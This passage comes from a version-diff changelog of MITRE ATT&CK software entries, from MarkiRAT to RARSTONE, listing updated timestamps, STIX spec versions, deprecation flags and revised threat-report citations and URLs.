modified | 2023-03-22 04:52:58.843000+00:00 | 2025-04-16 20:38:02.252000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0652] MarkiRAT
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-25 14:24:59.957000+00:00 | 2025-04-16 20:38:07.387000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0167] Matryoshka
Current version: 2.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-23 20:13:32.050000+00:00 | 2024-11-17 12:44:07.639000+00:00 |
external_references[3]['description'] | Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017. | Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved November 17, 2024. |
external_references[3]['url'] | https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf | https://cdn2.hubspot.net/hubfs/1903456/Whitepapers/CopyKittens.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0449] Maze
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-01-24 17:01:08.605000+00:00 | 2025-04-16 20:38:37.773000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0459] MechaFlounder
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-05-28 16:19:14.488000+00:00 | 2025-04-16 20:38:38.886000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0688] Meteor
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-14 15:48:23.444000+00:00 | 2025-04-16 20:38:37.573000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0179] MimiPenguin
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 16:57:34.776000+00:00 | 2025-04-16 20:38:52.183000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0051] MiniDuke
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-14 21:21:51.872000+00:00 | 2025-04-16 20:38:12.056000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0280] MirageFox
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-22 18:52:32.764000+00:00 | 2025-04-16 20:38:40.181000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0084] Mis-Type
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-09-30 20:04:42.419000+00:00 | 2025-04-16 20:38:39.359000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0083] Misdat
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-09-30 21:01:41.137000+00:00 | 2025-04-16 20:37:55.806000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0080] Mivast
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-20 20:09:46.802000+00:00 | 2025-04-16 20:38:45.394000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0079] MobileOrder
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:04.825000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0553] MoleNet
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-27 02:20:58.446000+00:00 | 2025-04-16 20:38:21.182000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1026] Mongall
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-24 18:53:41.304000+00:00 | 2025-04-16 20:38:16.324000+00:00 |
x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[S0149] MoonWind
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 19:57:17.490000+00:00 | 2025-04-16 20:38:27.217000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1047] Mori
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-17 14:42:30.109000+00:00 | 2025-04-16 20:38:19.542000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0699] Mythic
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-18 15:41:53.146000+00:00 | 2025-04-16 20:38:56.653000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0590] NBTscan
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-24 20:45:08.323000+00:00 | 2025-04-16 20:38:55.369000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0272] NDiskMonitor
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:07:15.145000+00:00 | 2025-04-16 20:38:36.313000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0034] NETEAGLE
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:07:46.499000+00:00 | 2024-11-17 15:05:25.106000+00:00 |
external_references[1]['description'] | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015. | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/05/20081935/rpt-apt30.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0198] NETWIRE
Current version: 1.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-20 20:04:20.149000+00:00 | 2025-04-16 20:38:00.152000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0353] NOKKI
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-18 15:22:32.747000+00:00 | 2025-04-16 20:37:53.448000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0205] Naid
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-01-06 19:32:28.371000+00:00 | 2024-11-17 19:55:07.588000+00:00 |
external_references[3]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
external_references[3]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0637] NativeZone
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-16 02:03:14.543000+00:00 | 2025-04-16 20:38:31.174000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0247] NavRAT
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-20 01:52:50.303000+00:00 | 2025-04-16 20:38:07.899000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0630] Nebulae
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 22:57:32.775000+00:00 | 2025-04-16 20:37:58.683000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0691] Neoichor
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-11 19:34:18.904000+00:00 | 2025-04-16 20:38:06.261000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0210] Nerex
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-01-06 19:32:28.182000+00:00 | 2024-11-17 19:55:07.591000+00:00 |
external_references[2]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
external_references[2]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0056] Net Crawler
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-22 18:37:22.182000+00:00 | 2025-04-16 20:38:45.551000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0033] NetTraveler
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:11:38.961000+00:00 | 2024-11-17 18:04:41.738000+00:00 |
external_references[1]['description'] | Kaspersky Lab's Global Research and Analysis Team. (n.d.). The NetTraveler (aka ‘Travnet’). Retrieved November 12, 2014. | Kaspersky Lab's Global Research and Analysis Team. (n.d.). The NetTraveler (aka ‘Travnet’). Retrieved November 17, 2024. |
external_references[1]['url'] | http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf | https://web.archive.org/web/20160326004042/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0457] Netwalker
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 05:03:29.436000+00:00 | 2025-04-16 20:38:17.793000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0118] Nidiran
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-15 16:27:20.897000+00:00 | 2025-04-16 20:38:27.055000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0368] NotPetya
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-08 22:11:21.842000+00:00 | 2025-04-16 20:38:09.202000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0138] OLDBAIT
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-26 17:51:20.402000+00:00 | 2024-11-17 14:43:38.590000+00:00 |
external_references[1]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0165] OSInfo
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-18 22:53:32.172000+00:00 | 2025-04-16 20:38:43.861000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0402] OSX/Shlayer
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-30 16:28:36.699000+00:00 | 2025-04-16 20:38:42.935000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0644] ObliqueRAT
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 14:43:12.250000+00:00 | 2025-04-16 20:38:09.744000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0346] OceanSalt
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:12:48.823000+00:00 | 2025-04-16 20:37:59.147000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0340] Octopus
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-06 17:15:58.173000+00:00 | 2025-04-16 20:38:39.717000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0439] Okrum
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-05-14 21:17:53.756000+00:00 | 2025-04-16 20:38:05.946000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0365] Olympic Destroyer
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-23 19:32:38.936000+00:00 | 2025-04-16 20:38:01.435000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0052] OnionDuke
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-09-23 15:21:12.900000+00:00 | 2025-04-16 20:38:30.711000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0264] OopsIE
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 02:36:44.945000+00:00 | 2025-04-16 20:38:21.971000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0229] Orz
Current version: 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-19 01:33:33.267000+00:00 | 2025-04-16 20:37:53.293000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0594] Out1
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-26 22:35:19.315000+00:00 | 2025-04-16 20:38:53.377000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0072] OwaAuth
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-06-17 19:03:17.306000+00:00 | 2025-04-16 20:38:28.901000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0598] P.A.S. Webshell
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-13 13:10:36.820000+00:00 | 2025-04-16 20:38:05.296000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0626] P8RAT
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-14 23:25:08.267000+00:00 | 2025-04-16 20:38:19.073000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0158] PHOREAL
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:15:03.862000+00:00 | 2025-04-16 20:38:43.708000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0254] PLAINTEE
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:15:33.608000+00:00 | 2025-04-16 20:37:58.191000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0435] PLEAD
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-15 11:32:25.173000+00:00 | 2025-04-16 20:38:31.485000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0216] POORAIM
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:16:18.343000+00:00 | 2024-11-17 15:01:33.389000+00:00 |
external_references[2]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0150] POSHSPY
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:16:53.396000+00:00 | 2025-04-16 20:38:11.901000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0145] POWERSOURCE
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-20 20:06:44.707000+00:00 | 2025-04-16 20:37:56.902000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0223] POWERSTATS
Current version: 2.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 05:13:46.664000+00:00 | 2025-04-16 20:38:40.984000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0371] POWERTON
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-25 16:21:36.260000+00:00 | 2025-04-16 20:38:41.138000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0184] POWRUNER
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-07-06 16:11:56.562000+00:00 | 2025-04-16 20:37:54.652000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0196] PUNCHBUGGY
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 13:31:34.134000+00:00 | 2025-04-16 20:38:11.382000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0197] PUNCHTRACK
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 13:31:34.134000+00:00 | 2025-04-16 20:38:34.395000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0664] Pandora
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-15 14:17:18.725000+00:00 | 2025-04-16 20:38:28.723000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0208] Pasam
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-01-06 19:32:28.265000+00:00 | 2024-11-17 19:55:07.592000+00:00 |
external_references[2]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
external_references[2]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0122] Pass-The-Hash Toolkit
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:54.785000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0556] Pay2Key
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-22 02:48:54.019000+00:00 | 2025-04-16 20:38:18.273000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0683] Peirates
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-14 20:55:21.371000+00:00 | 2025-04-16 20:38:52.924000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0643] Peppy
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 15:09:54.978000+00:00 | 2025-04-16 20:38:15.700000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0517] Pillowmint
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-26 19:34:38.763000+00:00 | 2025-04-16 20:38:33.297000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0048] PinchDuke
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:21:09.930000+00:00 | 2025-04-16 20:38:30.358000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0097] Ping
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-06 15:12:11.358000+00:00 | 2025-04-16 20:38:55.518000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1031] PingPull
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-24 18:51:58.072000+00:00 | 2025-04-16 20:38:02.753000+00:00 |
x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[S0124] Pisloader
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:21:44.379000+00:00 | 2025-04-16 20:38:32.474000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0012] PoisonIvy
Current version: 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-19 14:30:03.923000+00:00 | 2024-11-17 19:55:07.591000+00:00 |
external_references[8]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
external_references[8]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
[S0518] PolyglotDuke
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-26 19:42:34.359000+00:00 | 2025-04-16 20:38:03.362000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0453] Pony
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-25 21:57:40.642000+00:00 | 2025-04-16 20:37:58.346000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0378] PoshC2
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-06-03 17:45:36.186000+00:00 | 2025-04-16 20:38:51.558000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1046] PowGoop
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-17 14:40:59.636000+00:00 | 2025-04-16 20:38:34.085000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0177] Power Loader
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:37:55.103000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0139] PowerDuke
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:22:08.256000+00:00 | 2025-04-16 20:37:51.754000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1012] PowerLess
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-28 17:21:55.473000+00:00 | 2025-04-16 20:38:02.412000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0685] PowerPunch
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 05:12:04.169000+00:00 | 2025-04-16 20:38:37.108000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0441] PowerShower
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-05-20 20:43:49.960000+00:00 | 2025-04-16 20:38:07.537000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0194] PowerSploit
Current version: 1.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-17 19:50:17.832000+00:00 | 2025-04-16 20:38:50.246000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0393] PowerStallion
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-02-09 14:05:19.246000+00:00 | 2025-04-16 20:38:38.238000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1058] Prestige
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-02-24 22:25:15.162000+00:00 | 2025-04-16 20:37:57.513000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0654] ProLock
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 21:35:09.832000+00:00 | 2024-11-17 23:58:37.273000+00:00 |
external_references[1]['description'] | Group IB. (2020, September). LOCK LIKE A PRO. Retrieved September 27, 2021. | Group IB. (2020, September). LOCK LIKE A PRO. Retrieved November 17, 2024. |
external_references[1]['url'] | https://groupib.pathfactory.com/ransomware-reports/prolock_wp | https://web.archive.org/web/20220119114433/https://groupib.pathfactory.com/ransomware-reports/prolock_wp |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0279] Proton
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-01-22 16:19:40.969000+00:00 | 2025-04-16 20:38:34.550000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0238] Proxysvc
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:23:20.589000+00:00 | 2025-04-16 20:37:53.139000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0078] Psylo
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:23:59.127000+00:00 | 2025-04-16 20:38:39.039000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0147] Pteranodon
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-08-23 15:25:11.145000+00:00 | 2025-04-16 20:38:12.213000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0583] Pysa
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-27 20:19:31.430000+00:00 | 2025-04-16 20:38:27.874000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0269] QUADAGENT
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 05:20:12.492000+00:00 | 2025-04-16 20:38:19.712000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1076] QUIETCANARY
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-07-25 20:19:09.713000+00:00 | 2025-04-16 20:38:23.780000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0650] QakBot
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-17 16:10:03.901000+00:00 | 2024-11-17 13:02:32.758000+00:00 |
external_references[7]['description'] | Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved September 27, 2021. | Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved November 17, 2024. |
external_references[7]['url'] | https://success.trendmicro.com/solution/000283381 | https://success.trendmicro.com/en-US/solution/KA-0011282 |
[S0686] QuietSieve
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-15 12:31:52.469000+00:00 | 2025-04-16 20:37:52.215000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0055] RARSTONE
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
